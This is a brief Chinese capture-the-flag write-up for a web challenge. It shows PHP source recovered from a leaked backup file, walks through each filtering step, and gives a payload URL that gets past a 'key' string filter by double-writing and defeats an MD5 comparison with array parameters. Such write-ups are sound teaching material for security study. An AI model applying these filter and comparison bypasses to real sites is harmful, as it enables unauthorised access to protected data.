根据题目提示,就可以想到是备份文件泄露,通过后台扫描得到了一个index.php.bak的可下载文件,打开看到了index首页的源代码
<?php
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>
- 第一个$str:截取url中从?到结束的内容
- 第二个$str:将截取到的内容再次进行截取,从1的位置开始,目的是要去掉“?”
- 第三个$str:对第二步处理后的str再次进行处理,将str中的key替换为空
- parse_str()
由于str_replace函数会对key进行过滤,所以我们可以进行双写绕过
payload:http://target/web16/?kkeyey1[]=s878926199a&kekeyy2[]=s155964671a
MD5绕过可以看这里:MD5绕过